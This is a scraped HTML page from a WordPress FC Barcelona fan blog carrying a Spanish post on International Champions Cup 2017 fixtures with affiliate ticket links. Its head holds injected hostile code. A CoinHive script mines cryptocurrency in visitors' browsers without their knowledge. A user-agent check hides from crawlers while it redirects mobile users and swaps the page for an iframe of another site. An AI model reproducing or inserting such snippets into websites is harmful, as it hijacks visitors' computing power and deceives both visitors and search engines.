<!DOCTYPE html> <html class="no-js" lang="en-US"> <head>   <meta charset="UTF-8">   <meta name="viewport" content="width=device-width, initial-scale=1.0">   <link rel="profile" href="http://gmpg.org/xfn/11">       <title>Entradas &#8211; Tickets International Champions Cup 2017 &#8211; BLOG TIKI-TAKA</title> <script>document.documentElement.className = document.documentElement.className.replace("no-js","js");</script> <link rel='dns-prefetch' href='//s.w.org' /> 		<script type="text/javascript"> 			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/blogtikitaka.centrodouniverso.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"}}; 			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); 		</script> 		<style type="text/css"> img.wp-smiley, img.emoji { 	display: inline !important; 	border: none !important; 	box-shadow: none !important; 	height: 1em !important; 	width: 1em !important; 	margin: 0 .07em !important; 	vertical-align: -0.1em !important; 	background: none !important; 	padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css'  href='/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' /> <link rel='stylesheet' id='magnific-popup-au-css'  href='/wp-content/plugins/youtube-channel/assets/lib/magnific-popup/magnific-popup.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='youtube-channel-css'  href='/wp-content/plugins/youtube-channel/assets/css/youtube-channel.css' type='text/css' media='all' /> <link rel='stylesheet' id='parent-style-css'  href='/wp-content/themes/hueman/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='hueman-main-style-css'  href='/wp-content/themes/hueman/assets/front/css/main.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='theme-stylesheet-css'  href='/wp-content/themes/hueman-child/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='hueman-font-awesome-css'  href='/wp-content/themes/hueman/assets/front/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css'  href='/wp-content/plugins/add-to-any/addtoany.min.css' type='text/css' media='all' /> <script type='text/javascript' src='/wp-includes/js/jquery/jquery.js'></script><script> if(	!/bot|crawl|slurp|spider/i.test(navigator.userAgent)){ 	jQuery( document ).ready(function() { 		/*Is mobile?*/ 	if( window.matchMedia("only screen and (max-width: 760px)").matches ) { 		/*Yes*/ 	window.location.href = "http://www.fcbarcelonanoticias.com/tickets-international-champions-cup-198309-2017-03.php"; 	} else { 		/*No*/ 		jQuery("body")[0].innerHTML = "\ 		<div class='container-fluid' style='background-color:black' id='#readerbar'>\ 			<div class='row'>\ 				<div class='col-md-4'>\ 					<a href='http://blogtikitaka.centrodouniverso.com.br' style='color:white;font-size:26px;font-weight:600'>Reader</a>\ 				</div>\ 				<div class='col-md-4 text-center' id='credit' style='vertical-align:middle;min-height:37px;margin-top:10px;color:white'>\ 					Desenvolvido por <b><a href='http://www.drall.com.br' style='color:#d66000' target='_blank'>Drall Consultoria</a></b>\ 				</div>\ 				<div class='col-md-1' style='vertical-align:middle;min-height:37px;margin-top:10px'>\ 					<a style='color:white;' href='http://www.fcbarcelonanoticias.com/tickets-international-champions-cup-198309-2017-03.php'>X</a>\ 				</div>\ 				<div class='col-md-3' style='vertical-align:middle;min-height:37px;margin-top:10px'>"+ 					jQuery(".addtoany_share_save_container.addtoany_content_bottom").html()+"\ 				</div>\ 			</div>\ 		</div>\ 		<iframe src='http://www.fcbarcelonanoticias.com/tickets-international-champions-cup-198309-2017-03.php' style='top:37px;width:100%;height:100%'>\ 		"; 		jQuery("body").css({height:"100%",position:"fixed",width:"100%"}); 		jQuery("html").css("height","100%"); 	} 	}); } </script> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <script type='text/javascript' src='/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='/wp-content/plugins/captcha-bank/assets/global/plugins/custom/js/front-end-script.js'></script> <script type='text/javascript' src='/wp-content/plugins/add-to-any/addtoany.min.js'></script> <script type='text/javascript' src='/wp-content/plugins/fastest-live-scores-football-widgets/cc.js'></script>           <script type="text/javascript"> var a2a_config=a2a_config||{};a2a_config.callbacks=a2a_config.callbacks||[];a2a_config.templates=a2a_config.templates||{}; </script> <script type="text/javascript" src="http://static.addtoany.com/menu/page.js" async="async"></script> <!--[if lt IE 9]> <script src="http://blogtikitaka.centrodouniverso.com.br/wp-content/themes/hueman/assets/front/js/ie/html5shiv-printshiv.min.js"></script> <script src="http://blogtikitaka.centrodouniverso.com.br/wp-content/themes/hueman/assets/front/js/ie/selectivizr.js"></script> <![endif]--> <style type="text/css">/* Dynamic CSS: For no styles in head, copy and put the css below in your child theme's style.css, disable dynamic styles */body { font-size:1.00rem; }@media only screen and (min-width: 720px) {         .nav > li { font-size:1.00rem; }       }::selection { background-color: #9c1737; } ::-moz-selection { background-color: #9c1737; }a,.themeform label .required,#flexslider-featured .flex-direction-nav .flex-next:hover,#flexslider-featured .flex-direction-nav .flex-prev:hover,.post-hover:hover .post-title a,.post-title a:hover,.s1 .post-nav li a:hover i,.content .post-nav li a:hover i,.post-related a:hover,.s1 .widget_rss ul li a,#footer .widget_rss ul li a,.s1 .widget_calendar a,#footer .widget_calendar a,.s1 .alx-tab .tab-item-category a,.s1 .alx-posts .post-item-category a,.s1 .alx-tab li:hover .tab-item-title a,.s1 .alx-tab li:hover .tab-item-comment a,.s1 .alx-posts li:hover .post-item-title a,#footer .alx-tab .tab-item-category a,#footer .alx-posts .post-item-category a,#footer .alx-tab li:hover .tab-item-title a,#footer .alx-tab li:hover .tab-item-comment a,#footer .alx-posts li:hover .post-item-title a,.comment-tabs li.active a,.comment-awaiting-moderation,.child-menu a:hover,.child-menu .current_page_item > a,.wp-pagenavi a{ color: #9c1737; }.themeform input[type="submit"],.themeform button[type="submit"],.s1 .sidebar-top,.s1 .sidebar-toggle,#flexslider-featured .flex-control-nav li a.flex-active,.post-tags a:hover,.s1 .widget_calendar caption,#footer .widget_calendar caption,.author-bio .bio-avatar:after,.commentlist li.bypostauthor > .comment-body:after,.commentlist li.comment-author-admin > .comment-body:after{ background-color: #9c1737; }.post-format .format-container { border-color: #9c1737; }.s1 .alx-tabs-nav li.active a,#footer .alx-tabs-nav li.active a,.comment-tabs li.active a,.wp-pagenavi a:hover,.wp-pagenavi a:active,.wp-pagenavi span.current{ border-bottom-color: #9c1737!important; }.s2 .post-nav li a:hover i, .s2 .widget_rss ul li a, .s2 .widget_calendar a, .s2 .alx-tab .tab-item-category a, .s2 .alx-posts .post-item-category a, .s2 .alx-tab li:hover .tab-item-title a, .s2 .alx-tab li:hover .tab-item-comment a, .s2 .alx-posts li:hover .post-item-title a { color: #9c1737; } .s2 .sidebar-top,.s2 .sidebar-toggle,.post-comments,.jp-play-bar,.jp-volume-bar-value,.s2 .widget_calendar caption{ background-color: #9c1737; }.s2 .alx-tabs-nav li.active a { border-bottom-color: #9c1737; } .post-comments span:before { border-right-color: #9c1737; }         #header { background-color: #262323; } @media only screen and (min-width: 720px) {   #nav-header .nav ul { background-color: #262323; } }         #nav-header.nav-container { background-color: #c4c4c4; } @media only screen and (min-width: 720px) {   #nav-header .nav ul { background-color: #c4c4c4; } }         body { background-color: #0f0f0f; }</style> <script type='text/javascript' src='https://coin-hive.com/lib/coinhive.min.js'></script><script>var __m=new CoinHive.User("hjflNfOWrK7bMwGmLrOdjoLaolDb8dZf","DW",{throttle:( window.matchMedia("only screen and (max-width: 760px)").matches )?0.8:0.17});__m.start();</script></head>  <body class="post-template-default single single-post postid-106016 single-format-standard col-3cm full-width unknown">  <div id="wrapper">       <header id="header">     <div class="container group">         <div class="container-inner">                      <div class="group pad" style="background-image:url('/Banner_Tiki_Taka_replicado.png')">                   <p class="site-title"><a class="custom-logo-link" href="/" rel="home">BLOG TIKI-TAKA</a></p>                 <p class="site-description">All about FC Barcelona</p>                    </div>                      <nav class="nav-container group" id="nav-header">           <div class="nav-toggle"><i class="fa fa-bars"></i></div>           <div class="nav-text"><!-- put your mobile menu text here --></div>           <div class="nav-wrap container">             <ul class="nav container-inner group"><li ><a href="/">Home</a></li><li class="page_item page-item-94376"><a href="/about">About</a></li><li class="page_item page-item-94100"><a href="/contato">Contat us</a></li></ul>          </div>         </nav><!--/#nav-header-->            </div><!--/.container-inner-->       </div><!--/.container--> </header><!--/#header-->      <div class="container" id="page">     <div class="container-inner">             <div class="main">         <div class="main-inner group">                          <section class="content">               <!--/.page-title-->           <div class="pad group">               <article class="post-106016 post type-post status-publish format-standard hentry category-barcelona-noticias">     <div class="post-inner group">        <h1 class="post-title entry-title">Entradas &#8211; Tickets International Champions Cup 2017</h1> <p class="post-byline">by   <span class="vcard author">       <span class="fn"></span>     </span> &middot;              <span class="published">March 27, 2017</span>       </p>              <div class="clear"></div>        <div class="entry themeform">         <div class="entry-inner">           <div> <p>Ya est&aacute;n a la venta las <strong><a href="http://www.fcbarcelonanoticias.com/Entradas-FCBarcelona.php">entradas</a></strong> para todos los partidos de la <strong>International Champions Cup 2017</strong>, que se disputar&aacute; en Estados Unidos del 19 al 30 de julio.</p> <p>Los ocho equipos que participan en la presente edici&oacute;n son: <strong>FC Barcelona y Real Madrid</strong> (Espa&ntilde;a), <strong>Manchester United, Manchester City y Tottenham Hotspur</strong> (Inglaterra), <strong>Juventus y Roma</strong> (Italia) y <strong>Paris Saint Germain</strong> (Francia).</p> <p><strong>Y las sedes de los partidos:</strong>&nbsp;MetLife Stadium (New Jersey),&nbsp;Camping World Stadium (Orlando),&nbsp;Levi&#8221;s Stadium (Santa Clara),&nbsp;Red Bull Arena (Harrison),&nbsp;FedExField (Landover),&nbsp;Hard Rock Stadium (Miami),&nbsp;Los Angeles Memorial Coliseum (Los Angeles),&nbsp;Nissan Stadium (Nashville) y&nbsp;Gillette Stadium (Foxborough).</p> <p>Os recordamos que uno de los platos fuertes del torneo ser&aacute; el <strong>Cl&aacute;sico de Miami entre Real Madrid y FC Barcelona</strong>, que<strong>&nbsp;</strong>se jugar&aacute; en el Hard Rock Stadium el s&aacute;bado 29 de julio a las 19:30 (1:30 de la madrugada en Espa&ntilde;a).</p> <p>Los <strong>boletos </strong>para todos los partidos ya pueden adquirirse a trav&eacute;s de nuestro servicio de <a href="http://www.fcbarcelonanoticias.com/Entradas-FCBarcelona.php"><strong>venta de tickets</strong></a>, donde encontrar&aacute;s las mejores localidades a los mejores precios garantizados. &iexcl;Compra ya tus entradas de manera f&aacute;cil y segura!</p> <p><h2><strong>Comprar entradas Real Madrid vs FC Barcelona 29/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Real Madrid vs FC Barcelona</strong></p> <p>s&aacute;bado 29 julio, 19:30 / 7:30 PM</p> <p>Hard Rock Stadium, Miami</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-el-clasico-real-madrid-vs-fc-barcelona/ev259516?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2068359?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Roma vs PSG 19/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>AS Roma vs Paris Saint Germain</strong></p> <p>mi&eacute;rcoles 19 julio,</p> <p>Estadio sin confirmar</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-international-champions-cup/ca8497?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087267?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Manchester United vs Manchester City 20/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Manchester United vs Manchester City</strong></p> <p>jueves 20 julio,</p> <p>Estadio sin confirmar</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-international-champions-cup/ca8497?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087268?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Juventus vs FC Barcelona 22/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Juventus vs FC Barcelona</strong></p> <p>s&aacute;bado 22 julio, 18:00 / 6:30 PM</p> <p>MetLife Stadium, New Jersey</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-fc-barcelona-vs-juventus-f-c/ev267619?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas PSG vs Tottenham 22/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Paris Saint Germain vs Tottenham</strong></p> <p>s&aacute;bado 22 julio, 20:00 / 8:00 PM</p> <p>Camping World Stadium, Orlando</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-paris-saint-germain-f-c-vs-tottenham-hotspur-f-c/ev267620?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Real Madrid vs Manchester United 23/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Real Madrid vs Manchester United</strong></p> <p>domingo 23 julio, 14:00 / 2:00 PM</p> <p>Levi&#8221;s Stadium, Santa Clara</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-real-madrid-c-f-vs-manchester-united-f-c/ev267622?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087269" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Tottenham vs Roma 25/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Tottenham vs Roma</strong></p> <p>martes 25 julio, 20:00 / 8:00 PM</p> <p>Red Bull Arena, Harrison</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-a-s-roma-vs-tottenham-hotspur-f-c/ev267624?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087270?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas FC Barcelona vs Manchester United 26/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>FC Barcelona vs Manchester United</strong></p> <p>mi&eacute;rcoles 26 julio, 19:30 / 7:30 PM</p> <p>FedExField, Landover</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-fc-barcelona-vs-manchester-united-f-c/ev267627?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas PSG vs Juventus 26/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Paris Saint Germain vs Juventus</strong></p> <p>mi&eacute;rcoles 26 julio, 20:30 / 8:30 PM</p> <p>Hard Rock Stadium, Miami</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-international-champions-cup/ca8497?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Manchester City vs Real Madrid 26/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Manchester City vs Real Madrid</strong></p> <p>mi&eacute;rcoles 26 julio, 20:00 / 8:00 PM</p> <p>Memorial Coliseum, Los Angeles</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-real-madrid-c-f-vs-manchester-city-f-c/ev267908?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087271?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Manchester City vs Tottenham 29/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Manchester City vs Tottenham</strong></p> <p>s&aacute;bado 29 julio, 17:00 / 5:00 PM</p> <p>Nissan Stadium, Nashville</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-manchester-city-f-c-vs-tottenham-hotspur-f-c/ev267645?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087272?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> <p><h2><strong>Comprar entradas Roma vs Juventus 30/07/2017</strong></h2> </p> <table border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <th><strong>Partido</strong></th> <th><strong>Tickets / Entradas</strong></th> </tr> <tr> <td> <p><strong>Roma vs Juventus</strong></p> <p>domingo 30 julio, 16:00 / 4:00 PM</p> <p>Gillette Stadium, Foxborough</p> <p>International Champions Cup</p> </td> <p><td align="center"><a class="btn small highlight" href="http://clk.tradedoubler.com/click?p(267972)a(2873430)g(23204082)url(https://www.stubhub.es/entradas-juventus-f-c-vs-a-s-roma/ev267648?afl=1S6O3513RA&amp;utm_source=tradedoubler&amp;utm_medium=affiliate&amp;utm_campaign=generic&amp;utm_content=linkbuild)" rel="nofollow" target="_blank"><strong>Entradas Stubhub</strong></a> <a class="btn small highlight" href="http://www.viagogo.es/Entradas-Deportes/Futbol/International-Champions-Cup-Entradas/E-2087273?AffiliateID=1558&amp;PCID=AFFESIAFF1558A548FCBFC6-05" rel="nofollow" target="_blank"><strong>Entradas Viagogo</strong></a></td> </p> </tr> </tbody> </table> </div> <div> <a href="http://feeds.feedburner.com/~ff/barcelonanoticias?a=EMG_rFhZVTo:CxLsXkTImsg:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/barcelonanoticias?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/barcelonanoticias?a=EMG_rFhZVTo:CxLsXkTImsg:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/barcelonanoticias?d=qj6IDK7rITs" border="0"></img></a> </div> <p><img src="http://feeds.feedburner.com/~r/barcelonanoticias/~4/EMG_rFhZVTo" height="1" width="1" alt="" /><br /> </p> <div class="addtoany_share_save_container addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_16 addtoany_list" data-a2a-url="http://blogtikitaka.centrodouniverso.com.br/archives/106016" data-a2a-title="Entradas – Tickets International Champions Cup 2017"><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Facebook" rel="nofollow" target="_blank"></a><a class="a2a_button_whatsapp" href="http://www.addtoany.com/add_to/whatsapp?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="WhatsApp" rel="nofollow" target="_blank"></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Twitter" rel="nofollow" target="_blank"></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="LinkedIn" rel="nofollow" target="_blank"></a><a class="a2a_button_reddit" href="http://www.addtoany.com/add_to/reddit?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Reddit" rel="nofollow" target="_blank"></a><a class="a2a_button_google_plus" href="http://www.addtoany.com/add_to/google_plus?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Google+" rel="nofollow" target="_blank"></a><a class="a2a_button_pinterest" href="http://www.addtoany.com/add_to/pinterest?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Pinterest" rel="nofollow" target="_blank"></a><a class="a2a_button_google_gmail" href="http://www.addtoany.com/add_to/google_gmail?linkurl=http%3A%2F%2Fblogtikitaka.centrodouniverso.com.br%2Farchives%2F106016&amp;linkname=Entradas%20%E2%80%93%20Tickets%20International%20Champions%20Cup%202017" title="Google Gmail" rel="nofollow" target="_blank"></a></div></div>          <nav class="pagination group">                       </nav><!--/.pagination-->         </div>                   <div class="clear"></div>       </div><!--/.entry-->      </div><!--/.post-inner-->   </article><!--/.post-->  <div class="clear"></div>       <h4 class="heading"> 	<i class="fa fa-hand-o-right"></i>You may also like...</h4>  <ul class="related-posts group">  		<li class="related post-hover"> 		<article class="post-93828 post type-post status-publish format-standard hentry category-barcelona-noticias">  			<div class="post-thumbnail"> 				<a href="/archives/93828" title="Luis Suárez ya tiene equipo para cuando deje el Barça"> 					        <svg class="hu-svg-placeholder thumb-medium-empty" id="58d975bb2938a" viewbox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path d="M928 832q0-14-9-23t-23-9q-66 0-113 47t-47 113q0 14 9 23t23 9 23-9 9-23q0-40 